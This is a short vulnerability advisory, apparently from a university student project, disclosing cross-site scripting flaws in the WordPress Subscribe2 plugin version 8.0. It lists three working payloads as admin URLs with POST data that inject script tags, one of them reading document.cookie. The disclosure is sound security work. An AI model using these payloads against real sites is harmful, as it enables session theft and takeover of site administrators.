WordPress Subscribe2 plugin version 8.0 suffers from a cross site scripting vulnerability.
94c7a47e4f9a399c9958989800a269ea409046b1cf8a970fafa2783281d5f279
Hi
We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin.
We have confirmed at least one of the reported vulnerabilities and created a working exploit located below.
Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue.
Module: Subscribe2
Version: 8.0
Confirmed exploits:
Exploit:
http://wp.bacon/wp-admin/admin.php?page=s2_posts
POST Data: subject="><script>alert(1)</script>
Exploit:
http://wp.bacon/wp-admin/admin.php?page=s2_settings
POST data: _wpnonce=50a78f7b07&s2_admin=options&barred=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Submit
# Requires valid nonce
Exploit:
http://wp.bacon/wp-admin/admin.php?page=s2_tools
POST data: searchterm="><script>alert(document.cookie)</script>
Best Regards
Heine Pedersen and Torben Jensen
Student project group: sw101f12
Aalborg University
Denmark